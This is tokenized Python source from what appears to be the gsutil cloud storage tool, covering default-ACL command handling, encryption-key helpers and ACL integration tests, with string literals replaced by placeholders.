self . sub_opts : <EOL> for o , a in self . sub_opts : <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . GROUP ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . USER ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( <EOL> aclhelpers . AclChange ( a , scope_type = aclhelpers . ChangeType . PROJECT ) ) <EOL> if o == '<STR_LIT>' : <EOL> self . changes . append ( aclhelpers . AclDel ( a ) ) <EOL> if not self . changes : <EOL> raise CommandException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ( not UrlsAreForSingleProvider ( self . args ) or <EOL> StorageUrlFromString ( self . args [ <NUM_LIT:0> ] ) . scheme != '<STR_LIT>' ) : <EOL> raise CommandException ( <EOL> '<STR_LIT>' . format ( <EOL> self . command_name ) ) <EOL> bucket_urls = set ( ) <EOL> for url_arg in self . args : <EOL> for result in self . WildcardIterator ( url_arg ) : <EOL> if not result . storage_url . IsBucket ( ) : <EOL> raise CommandException ( <EOL> '<STR_LIT>' ) <EOL> bucket_urls . add ( result . storage_url ) <EOL> for storage_url in bucket_urls : <EOL> self . ApplyAclChanges ( storage_url ) <EOL> @ Retry ( ServiceException , tries = <NUM_LIT:3> , timeout_secs = <NUM_LIT:1> ) <EOL> def ApplyAclChanges ( self , url ) : <EOL> """<STR_LIT>""" <EOL> bucket = self . gsutil_api . GetBucket ( <EOL> url . bucket_name , provider = url . scheme , <EOL> fields = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> current_acl = bucket . defaultObjectAcl <EOL> modification_count = <NUM_LIT:0> <EOL> for change in self . changes : <EOL> modification_count += change . Execute ( <EOL> url , current_acl , '<STR_LIT>' , self . logger ) <EOL> if modification_count == <NUM_LIT:0> : <EOL> self . logger . info ( '<STR_LIT>' , url ) <EOL> return <EOL> if not current_acl : <EOL> current_acl . append ( PRIVATE_DEFAULT_OBJ_ACL ) <EOL> try : <EOL> preconditions = Preconditions ( meta_gen_match = bucket . metageneration ) <EOL> bucket_metadata = apitools_messages . Bucket ( defaultObjectAcl = current_acl ) <EOL> self . gsutil_api . PatchBucket ( url . bucket_name , bucket_metadata , <EOL> preconditions = preconditions , <EOL> provider = url . scheme , fields = [ '<STR_LIT:id>' ] ) <EOL> except BadRequestException as e : <EOL> raise CommandException ( '<STR_LIT>' % str ( e ) ) <EOL> except AccessDeniedException : <EOL> self . _WarnServiceAccounts ( ) <EOL> raise CommandException ( '<STR_LIT>' <EOL> '<STR_LIT>' % url ) <EOL> self . logger . info ( '<STR_LIT>' , url ) <EOL> def RunCommand ( self ) : <EOL> """<STR_LIT>""" <EOL> action_subcommand = self . args . pop ( <NUM_LIT:0> ) <EOL> self . ParseSubOpts ( check_args = True ) <EOL> self . def_acl = True <EOL> self . continue_on_error = False <EOL> if action_subcommand == '<STR_LIT>' : <EOL> func = self . _GetDefAcl <EOL> elif action_subcommand == '<STR_LIT>' : <EOL> func = self . _SetDefAcl <EOL> elif action_subcommand in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> func = self . _ChDefAcl <EOL> else : <EOL> raise CommandException ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % <EOL> ( action_subcommand , self . command_name ) ) <EOL> func ( ) <EOL> return <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import binascii <EOL> from hashlib import sha256 <EOL> import boto <EOL> from gslib . cloud_api import CryptoTuple <EOL> from gslib . exception import CommandException <EOL> _MAX_DECRYPTION_KEYS = <NUM_LIT:100> <EOL> def CryptoTupleFromKey ( crypto_key ) : <EOL> """<STR_LIT>""" <EOL> return CryptoTuple ( crypto_key ) if crypto_key else None <EOL> def FindMatchingCryptoKey ( key_sha256 ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> if encryption_key is not None : <EOL> if key_sha256 == Base64Sha256FromBase64EncryptionKey ( encryption_key ) : <EOL> return encryption_key <EOL> for i in range ( _MAX_DECRYPTION_KEYS ) : <EOL> key_number = i + <NUM_LIT:1> <EOL> decryption_key = boto . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' % str ( key_number ) , None ) <EOL> if decryption_key is None : <EOL> break <EOL> elif key_sha256 == Base64Sha256FromBase64EncryptionKey ( decryption_key ) : <EOL> return decryption_key <EOL> def GetEncryptionTuple ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = _GetBase64EncryptionKey ( ) <EOL> return CryptoTuple ( encryption_key ) if encryption_key else None <EOL> def GetEncryptionTupleAndSha256Hash ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key_sha256 = None <EOL> encryption_tuple = GetEncryptionTuple ( ) <EOL> if encryption_tuple : <EOL> encryption_key_sha256 = Base64Sha256FromBase64EncryptionKey ( <EOL> encryption_tuple . crypto_key ) <EOL> return ( encryption_tuple , encryption_key_sha256 ) <EOL> def Base64Sha256FromBase64EncryptionKey ( encryption_key ) : <EOL> return base64 . encodestring ( binascii . unhexlify ( <EOL> _CalculateSha256FromString ( <EOL> base64 . decodestring ( encryption_key ) ) ) ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def _CalculateSha256FromString ( input_string ) : <EOL> sha256_hash = sha256 ( ) <EOL> sha256_hash . update ( input_string ) <EOL> return sha256_hash . hexdigest ( ) <EOL> def _GetBase64EncryptionKey ( ) : <EOL> """<STR_LIT>""" <EOL> encryption_key = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> if encryption_key : <EOL> try : <EOL> base64 . decodestring ( encryption_key ) <EOL> except : <EOL> raise CommandException ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return encryption_key </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import re <EOL> from gslib import aclhelpers <EOL> from gslib . command import CreateGsutilLogger <EOL> from gslib . cs_api_map import ApiSelector <EOL> from gslib . project_id import PopulateProjectId <EOL> from gslib . storage_url import StorageUrlFromString <EOL> import gslib . tests . testcase as testcase <EOL> from gslib . tests . testcase . integration_testcase import SkipForGS <EOL> from gslib . tests . testcase . integration_testcase import SkipForS3 <EOL> from gslib . tests . util import ObjectToURI as suri <EOL> from gslib . tests . util import unittest <EOL> from gslib . translation_helper import AclTranslation <EOL> from gslib . util import Retry <EOL> PUBLIC_READ_JSON_ACL_TEXT = '<STR_LIT>' <EOL> class TestAclBase ( testcase . GsUtilIntegrationTestCase ) : <EOL> """<STR_LIT>""" <EOL> _set_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _get_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _set_defacl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _ch_acl_prefix = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _project_team = '<STR_LIT>' <EOL> _project_test_acl = '<STR_LIT>' % ( _project_team , PopulateProjectId ( ) ) <EOL> @ SkipForS3 ( '<STR_LIT>' ) <EOL> class TestAcl ( TestAclBase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestAcl , self ) . setUp ( ) <EOL> self . sample_uri = self . CreateBucket ( ) <EOL> self . sample_url = StorageUrlFromString ( str ( self . sample_uri ) ) <EOL> self . logger = CreateGsutilLogger ( '<STR_LIT>' ) <EOL> def test_set_invalid_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_invalid_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_json_api_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_xml_acl_json_api_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> stderr = self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_valid_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , obj_uri ] ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_set_valid_permission_whitespace_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri ] , <EOL> return_stdout = True ) <EOL> acl_string = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , acl_string ) <EOL> acl_string = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , acl_string ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , obj_uri ] ) <EOL> def test_set_valid_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _ServiceAccountCredentialsPresent ( ) : <EOL> unittest . skip ( '<STR_LIT>' ) <EOL> bucket_uri = suri ( self . CreateBucket ( ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , bucket_uri ] ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ inpath , bucket_uri ] ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ bucket_uri ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_invalid_canned_acl_object ( self ) : <EOL> """<STR_LIT>""" <EOL> obj_uri = suri ( self . CreateObject ( contents = '<STR_LIT:foo>' ) ) <EOL> stderr = self . RunGsUtil ( <EOL> self . _set_acl_prefix + [ '<STR_LIT>' , obj_uri ] , <EOL> return_stderr = True , expected_status = <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> self . assertIn ( '<STR_LIT>' , stderr ) <EOL> def test_set_valid_def_acl_bucket ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateBucket ( ) <EOL> obj_uri1 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT:foo>' ) ) <EOL> acl_string = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri1 ] , <EOL> return_stdout = True ) <EOL> self . RunGsUtil ( <EOL> self . _set_defacl_prefix + [ '<STR_LIT>' , suri ( bucket_uri ) ] ) <EOL> obj_uri2 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT>' ) ) <EOL> acl_string2 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri2 ] , <EOL> return_stdout = True ) <EOL> inpath = self . CreateTempFile ( contents = acl_string ) <EOL> self . RunGsUtil ( self . _set_defacl_prefix + [ inpath , suri ( bucket_uri ) ] ) <EOL> obj_uri3 = suri ( self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT>' ) ) <EOL> acl_string3 = self . RunGsUtil ( self . _get_acl_prefix + [ obj_uri3 ] , <EOL> return_stdout = True ) <EOL> self . assertNotEqual ( acl_string , acl_string2 ) <EOL> self . assertIn ( '<STR_LIT>' , acl_string2 ) <EOL> self . assertEqual ( acl_string , acl_string3 ) <EOL> def test_acl_set_version_specific_uri ( self ) : <EOL> """<STR_LIT>""" <EOL> bucket_uri = self . CreateVersionedBucket ( ) <EOL> uri = self . CreateObject ( bucket_uri = bucket_uri , contents = '<STR_LIT:data>' ) <EOL> inpath = self . CreateTempFile ( contents = '<STR_LIT>' ) <EOL> self . RunGsUtil ( [ '<STR_LIT>' , inpath , uri . uri ] ) <EOL> lines = self . AssertNObjectsInBucket ( bucket_uri , <NUM_LIT:2> , versioned = True ) <EOL> v0_uri_str , v1_uri_str = lines [ <NUM_LIT:0> ] , lines [ <NUM_LIT:1> ] <EOL> orig_acls = [ ] <EOL> for uri_str in ( v0_uri_str , v1_uri_str ) : <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertNotIn ( PUBLIC_READ_JSON_ACL_TEXT , <EOL> self . _strip_json_whitespace ( acl ) ) <EOL> orig_acls . append ( acl ) <EOL> self . RunGsUtil ( self . _set_acl_prefix + [ '<STR_LIT>' , v0_uri_str ] ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ v0_uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertIn ( PUBLIC_READ_JSON_ACL_TEXT , self . _strip_json_whitespace ( acl ) ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ v1_uri_str ] , <EOL> return_stdout = True ) <EOL> self . assertNotIn ( PUBLIC_READ_JSON_ACL_TEXT , <EOL> self . _strip_json_whitespace ( acl ) ) <EOL> acl = self . RunGsUtil ( self . _get_acl_prefix + [ uri . uri ] , return_stdout = True ) <EOL> self . assertEqual ( acl , orig_acls [ <NUM_LIT:0> ] ) <EOL> def _strip_json_whitespace ( self , json_text ) : <EOL> return re . sub ( r'<STR_LIT>' , '<STR_LIT>' , json_text ) <EOL> def testAclChangeWithUserId ( self ) : <EOL> change = aclhelpers . AclChange ( self . USER_TEST_ID + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ID ) <EOL> def testAclChangeWithGroupId ( self ) : <EOL> change = aclhelpers . AclChange ( self . GROUP_TEST_ID + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ID ) <EOL> def testAclChangeWithUserEmail ( self ) : <EOL> change = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> def testAclChangeWithGroupEmail ( self ) : <EOL> change = aclhelpers . AclChange ( self . GROUP_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> def testAclChangeWithDomain ( self ) : <EOL> change = aclhelpers . AclChange ( self . DOMAIN_TEST + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . DOMAIN_TEST ) <EOL> def testAclChangeWithProjectOwners ( self ) : <EOL> change = aclhelpers . AclChange ( self . _project_test_acl + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . PROJECT ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> def testAclChangeWithAllUsers ( self ) : <EOL> change = aclhelpers . AclChange ( '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testAclChangeWithAllAuthUsers ( self ) : <EOL> change = aclhelpers . AclChange ( '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> change . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> remove = aclhelpers . AclDel ( '<STR_LIT>' ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def testAclDelWithUser ( self ) : <EOL> add = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . USER ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> remove = aclhelpers . AclDel ( self . USER_TEST_ADDRESS ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> def testAclDelWithProjectOwners ( self ) : <EOL> add = aclhelpers . AclChange ( self . _project_test_acl + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . PROJECT ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> remove = aclhelpers . AclDel ( self . _project_test_acl ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . _project_test_acl ) <EOL> def testAclDelWithGroup ( self ) : <EOL> add = aclhelpers . AclChange ( self . USER_TEST_ADDRESS + '<STR_LIT>' , <EOL> scope_type = aclhelpers . ChangeType . GROUP ) <EOL> acl = list ( AclTranslation . BotoBucketAclToMessage ( self . sample_uri . get_acl ( ) ) ) <EOL> add . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHas ( acl , '<STR_LIT>' , '<STR_LIT>' , self . USER_TEST_ADDRESS ) <EOL> remove = aclhelpers . AclDel ( self . USER_TEST_ADDRESS ) <EOL> remove . Execute ( self . sample_url , acl , '<STR_LIT>' , self . logger ) <EOL> self . _AssertHasNo ( acl , '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> def _AssertHas ( self , current_acl , perm , scope , value = None ) : <EOL> matches = list ( self . _YieldMatchingEntriesJson ( current_acl , perm , scope , <EOL> value ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( matches ) ) <EOL> def _AssertHasNo ( self , current_acl , perm , scope , value = None ) : <EOL> matches = list ( self . _YieldMatchingEntriesJson ( current_acl , perm , scope , <EOL> value ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( matches ) ) <EOL> def _YieldMatchingEntriesJson ( self , current_acl , perm , scope , value = None ) : <EOL> """<STR_LIT>""" <EOL> for entry in current_acl : <EOL> if ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . entityId and value == entry . entityId and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . email and value == entry . email and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope == '<STR_LIT>' and <EOL> entry . domain and value == entry . domain and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> elif ( scope == '<STR_LIT>' and entry . role == perm and <EOL> value == entry . entityId ) : <EOL> yield entry <EOL> elif ( scope in [ '<STR_LIT>' , '<STR_LIT>' ] and <EOL> entry . entity . lower ( ) == scope . lower ( ) and <EOL> entry . role == perm ) : <EOL> yield entry <EOL> def _MakeScopeRegex ( self , role , entity_type , email_address ) : <EOL> template_regex = ( r'<STR_LIT>' % <EOL> ( entity_type , email_address , role ) ) <EOL> return re . compile ( template_regex , flags = re . DOTALL ) <EOL> def _MakeProjectScopeRegex ( self , role , project_team ) : <EOL> template_regex = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) % ( project_team , project_team , <EOL> role ) <EOL> return re . compile ( template_regex , flags = re . DOTALL ) <EOL> def testBucketAclChange ( self ) : <EOL> """<STR_LIT>""" <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT:user>' , self . USER_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS + '<STR_LIT>' , suri ( self . sample_uri ) ] ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> test_regex2 = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT:user>' , self . USER_TEST_ADDRESS ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS + '<STR_LIT>' , suri ( self . sample_uri ) ] ) <EOL> json_text2 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text2 , test_regex2 ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . USER_TEST_ADDRESS , suri ( self . sample_uri ) ] ) <EOL> json_text3 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text3 , test_regex ) <EOL> def testProjectAclChangesOnBucket ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . test_api == ApiSelector . XML : <EOL> stderr = self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . _project_test_acl + '<STR_LIT>' , <EOL> suri ( self . sample_uri ) ] , <EOL> expected_status = <NUM_LIT:1> , <EOL> return_stderr = True ) <EOL> self . assertIn ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , stderr ) <EOL> else : <EOL> test_regex = self . _MakeProjectScopeRegex ( <EOL> '<STR_LIT>' , self . _project_team ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . _project_test_acl + '<STR_LIT>' , <EOL> suri ( self . sample_uri ) ] ) <EOL> json_text = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> proj_num_id = test_regex . search ( json_text ) . group ( <NUM_LIT:1> ) <EOL> acl_to_remove = '<STR_LIT>' % ( self . _project_team , proj_num_id ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , acl_to_remove , suri ( self . sample_uri ) ] ) <EOL> json_text2 = self . RunGsUtil ( <EOL> self . _get_acl_prefix + [ suri ( self . sample_uri ) ] , return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text2 , test_regex ) <EOL> def testObjectAclChange ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> test_regex = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , test_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , test_regex ) <EOL> test_regex2 = self . _MakeScopeRegex ( <EOL> '<STR_LIT>' , '<STR_LIT>' , self . GROUP_TEST_ADDRESS ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS + '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text2 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text2 , test_regex2 ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , self . GROUP_TEST_ADDRESS , suri ( obj ) ] ) <EOL> json_text3 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text3 , test_regex2 ) <EOL> all_auth_regex = re . compile ( <EOL> r'<STR_LIT>' , <EOL> flags = re . DOTALL ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + [ '<STR_LIT>' , '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text4 = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text4 , all_auth_regex ) <EOL> def testObjectAclChangeAllUsers ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = self . CreateObject ( bucket_uri = self . sample_uri , contents = '<STR_LIT>' ) <EOL> self . AssertNObjectsInBucket ( self . sample_uri , <NUM_LIT:1> ) <EOL> all_users_regex = re . compile ( <EOL> r'<STR_LIT>' , flags = re . DOTALL ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertNotRegexpMatches ( json_text , all_users_regex ) <EOL> self . RunGsUtil ( self . _ch_acl_prefix + <EOL> [ '<STR_LIT>' , '<STR_LIT>' , suri ( obj ) ] ) <EOL> json_text = self . RunGsUtil ( self . _get_acl_prefix + [ suri ( obj ) ] , <EOL> return_stdout = True ) <EOL> self . assertRegexpMatches ( json_text , all_users_regex ) <EOL> def testMultithreadedAclChange ( self , count = <NUM_LIT:10> ) : <EOL> 